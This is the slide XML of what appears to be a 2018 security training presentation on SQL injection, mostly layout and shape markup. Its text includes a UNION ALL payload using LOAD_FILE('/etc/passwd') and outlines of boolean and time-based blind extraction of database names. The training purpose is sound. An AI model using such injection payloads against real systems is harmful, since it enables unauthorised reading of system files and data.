          <p:cNvPr id="577" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-179518" y="3134558"/>
            <a:ext cx="24743038" cy="6437388"/>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578" name="SELECT first_name, last_name…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6055345" y="3525914"/>
            <a:ext cx="9441161" cy="565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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> first_name, last_name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  u.id=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>UNION ALL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>LOAD_FILE</a:t>
            </a:r>
            <a:r>
              <a:t>('/etc/passwd') --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="35154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SQL</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Blind Injection"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Blind Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="584"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585"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586" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="588" name="blinds2.png" descr="blinds2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7167033" y="2897389"/>
            <a:ext cx="15529980" cy="8975611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="589" name="Syringe_PNG_Clipart-365.png" descr="Syringe_PNG_Clipart-365.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117765" y="5779100"/>
            <a:ext cx="6434239" cy="6683768"/>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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10187" y="6907098"/>
            <a:ext cx="24505974" cy="4409701"/>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594" name="Boolean"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Boolean</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="595"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596"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597" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="1. If the first letter of the first database's name is an 'A', throw error.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486063" y="7821310"/>
            <a:ext cx="23437275" cy="2581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4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1. If the first letter of the first database's name is an 'A', throw error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2. If the first letter of the first database's name is an 'B', throw error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>3. If the first letter of the first database's name is an 'C', throw error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="600" name="true-false.jpg" descr="true-false.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="6167" t="11657" r="7043" b="16"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13160617" y="497545"/>
            <a:ext cx="9503453" cy="6428979"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21527" h="21600" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="2780" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2712" y="260"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2675" y="403"/>
                  <a:pt x="2442" y="1411"/>
                  <a:pt x="2196" y="2499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1438" y="5855"/>
                  <a:pt x="972" y="7857"/>
                  <a:pt x="745" y="8729"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="626" y="9188"/>
                  <a:pt x="545" y="9604"/>
                  <a:pt x="566" y="9654"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="586" y="9704"/>
                  <a:pt x="568" y="9808"/>
                  <a:pt x="524" y="9886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="448" y="10022"/>
                  <a:pt x="-30" y="11990"/>
                  <a:pt x="2" y="12035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="12056"/>
                  <a:pt x="2439" y="12874"/>
                  <a:pt x="4020" y="13393"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4420" y="13524"/>
                  <a:pt x="4770" y="13660"/>
                  <a:pt x="4796" y="13694"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4840" y="13750"/>
                  <a:pt x="4651" y="15176"/>
                  <a:pt x="3962" y="20011"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3844" y="20840"/>
                  <a:pt x="3747" y="21538"/>
                  <a:pt x="3747" y="21561"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3747" y="21568"/>
                  <a:pt x="4131" y="21574"/>
                  <a:pt x="4677" y="21580"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5052" y="21572"/>
                  <a:pt x="5323" y="21562"/>
                  <a:pt x="5323" y="21551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5323" y="21336"/>
                  <a:pt x="6195" y="14262"/>
                  <a:pt x="6227" y="14209"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6251" y="14172"/>
                  <a:pt x="7469" y="14543"/>
                  <a:pt x="8935" y="15034"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10401" y="15525"/>
                  <a:pt x="12855" y="16340"/>
                  <a:pt x="14389" y="16845"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15924" y="17350"/>
                  <a:pt x="17219" y="17816"/>
                  <a:pt x="17266" y="17881"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17327" y="17965"/>
                  <a:pt x="17384" y="18523"/>
                  <a:pt x="17459" y="19780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17518" y="20759"/>
                  <a:pt x="17568" y="21569"/>
                  <a:pt x="17570" y="21581"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17571" y="21589"/>
                  <a:pt x="18211" y="21596"/>
                  <a:pt x="19029" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19026" y="21357"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19025" y="21221"/>
                  <a:pt x="18976" y="20510"/>
                  <a:pt x="18918" y="19777"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18859" y="19044"/>
                  <a:pt x="18832" y="18427"/>
                  <a:pt x="18857" y="18404"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18893" y="18371"/>
                  <a:pt x="21111" y="19089"/>
                  <a:pt x="21369" y="19217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21552" y="19308"/>
                  <a:pt x="21570" y="19117"/>
                  <a:pt x="21456" y="18274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21232" y="16608"/>
                  <a:pt x="20860" y="13502"/>
                  <a:pt x="20512" y="10391"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20483" y="10127"/>
                  <a:pt x="20448" y="10087"/>
                  <a:pt x="20103" y="9929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19896" y="9833"/>
                  <a:pt x="19399" y="9566"/>
                  <a:pt x="18999" y="9335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18598" y="9104"/>
                  <a:pt x="18067" y="8799"/>
                  <a:pt x="17816" y="8657"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17566" y="8514"/>
                  <a:pt x="16897" y="8131"/>
                  <a:pt x="16330" y="7804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15763" y="7478"/>
                  <a:pt x="15272" y="7199"/>
                  <a:pt x="15239" y="7186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15206" y="7172"/>
                  <a:pt x="15081" y="7097"/>
                  <a:pt x="14961" y="7020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14842" y="6943"/>
                  <a:pt x="14678" y="6851"/>
                  <a:pt x="14597" y="6814"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14517" y="6777"/>
                  <a:pt x="14224" y="6609"/>
                  <a:pt x="13948" y="6440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13672" y="6272"/>
                  <a:pt x="13418" y="6160"/>
                  <a:pt x="13383" y="6191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13349" y="6222"/>
                  <a:pt x="13270" y="6179"/>
                  <a:pt x="13207" y="6095"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13145" y="6011"/>
                  <a:pt x="13066" y="5967"/>
                  <a:pt x="13033" y="5998"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12999" y="6028"/>
                  <a:pt x="12950" y="5999"/>
                  <a:pt x="12923" y="5934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12896" y="5868"/>
                  <a:pt x="12819" y="5813"/>
                  <a:pt x="12752" y="5811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12686" y="5809"/>
                  <a:pt x="12549" y="5754"/>
                  <a:pt x="12449" y="5688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12349" y="5623"/>
                  <a:pt x="12254" y="5566"/>
                  <a:pt x="12237" y="5560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12221" y="5555"/>
                  <a:pt x="12134" y="5479"/>
                  <a:pt x="12045" y="5391"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11956" y="5303"/>
                  <a:pt x="11806" y="5215"/>
                  <a:pt x="11711" y="5196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11617" y="5178"/>
                  <a:pt x="11533" y="5155"/>
                  <a:pt x="11524" y="5146"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11516" y="5136"/>
                  <a:pt x="11481" y="5124"/>
                  <a:pt x="11446" y="5118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11412" y="5111"/>
                  <a:pt x="11358" y="5045"/>
                  <a:pt x="11327" y="4971"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11295" y="4897"/>
                  <a:pt x="11268" y="4872"/>
                  <a:pt x="11267" y="4915"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11267" y="4958"/>
                  <a:pt x="11227" y="4944"/>
                  <a:pt x="11178" y="4884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11130" y="4825"/>
                  <a:pt x="11063" y="4800"/>
                  <a:pt x="11031" y="4830"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10998" y="4859"/>
                  <a:pt x="10954" y="4842"/>
                  <a:pt x="10933" y="4791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10912" y="4740"/>
                  <a:pt x="10869" y="4722"/>
                  <a:pt x="10838" y="4751"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10806" y="4780"/>
                  <a:pt x="10764" y="4736"/>
                  <a:pt x="10743" y="4656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10722" y="4576"/>
                  <a:pt x="10670" y="4532"/>
                  <a:pt x="10626" y="4556"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10583" y="4581"/>
                  <a:pt x="10514" y="4541"/>
                  <a:pt x="10473" y="4467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10431" y="4393"/>
                  <a:pt x="10341" y="4339"/>
                  <a:pt x="10271" y="4347"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10202" y="4355"/>
                  <a:pt x="10124" y="4352"/>
                  <a:pt x="10099" y="4340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10074" y="4329"/>
                  <a:pt x="10025" y="4314"/>
                  <a:pt x="9991" y="4308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9956" y="4302"/>
                  <a:pt x="9908" y="4256"/>
                  <a:pt x="9885" y="4207"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9795" y="4021"/>
                  <a:pt x="9577" y="3891"/>
                  <a:pt x="9532" y="3998"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9503" y="4067"/>
                  <a:pt x="9464" y="4046"/>
                  <a:pt x="9408" y="3934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9363" y="3842"/>
                  <a:pt x="9326" y="3798"/>
                  <a:pt x="9326" y="3836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9326" y="3874"/>
                  <a:pt x="9254" y="3821"/>
                  <a:pt x="9166" y="3719"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9078" y="3616"/>
                  <a:pt x="8962" y="3533"/>
                  <a:pt x="8908" y="3532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8854" y="3532"/>
                  <a:pt x="8732" y="3471"/>
                  <a:pt x="8635" y="3396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8538" y="3321"/>
                  <a:pt x="8447" y="3278"/>
                  <a:pt x="8432" y="3300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8417" y="3322"/>
                  <a:pt x="8282" y="3238"/>
                  <a:pt x="8132" y="3114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7980" y="2988"/>
                  <a:pt x="7805" y="2908"/>
                  <a:pt x="7740" y="2934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7671" y="2960"/>
                  <a:pt x="7607" y="2927"/>
                  <a:pt x="7589" y="2856"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7571" y="2789"/>
                  <a:pt x="7470" y="2707"/>
                  <a:pt x="7365" y="2673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7259" y="2640"/>
                  <a:pt x="7142" y="2575"/>
                  <a:pt x="7104" y="2529"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7066" y="2484"/>
                  <a:pt x="7011" y="2456"/>
                  <a:pt x="6983" y="2465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6954" y="2475"/>
                  <a:pt x="6849" y="2427"/>
                  <a:pt x="6749" y="2360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6649" y="2293"/>
                  <a:pt x="6540" y="2233"/>
                  <a:pt x="6506" y="2227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6473" y="2220"/>
                  <a:pt x="6350" y="2150"/>
                  <a:pt x="6233" y="2071"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6054" y="1949"/>
                  <a:pt x="5901" y="1858"/>
                  <a:pt x="5748" y="1780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5587" y="1698"/>
                  <a:pt x="5457" y="1618"/>
                  <a:pt x="5366" y="1545"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5307" y="1498"/>
                  <a:pt x="5234" y="1480"/>
                  <a:pt x="5205" y="1507"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5134" y="1572"/>
                  <a:pt x="4338" y="1207"/>
                  <a:pt x="4262" y="1075"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4229" y="1017"/>
                  <a:pt x="4131" y="964"/>
                  <a:pt x="4045" y="957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3958" y="951"/>
                  <a:pt x="3768" y="833"/>
                  <a:pt x="3620" y="695"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3473" y="556"/>
                  <a:pt x="3288" y="432"/>
                  <a:pt x="3209" y="419"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3129" y="406"/>
                  <a:pt x="3000" y="306"/>
                  <a:pt x="2922" y="197"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2780" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-179520" y="6907098"/>
            <a:ext cx="24963174" cy="4409701"/>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605" name="1. If the first letter of the first database's name is an 'A', wait for 10s.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487661" y="7821310"/>
            <a:ext cx="23628813" cy="2581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4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1. If the first letter of the first database's name is an 'A', wait for 10s.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2. If the first letter of the first database's name is an 'B', wait for 10s.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>3. If the first letter of the first database's name is an 'C', wait for 10s.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="606" name="stop-watch.png" descr="stop-watch.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="14060" t="4676" r="0" b="5210"/>
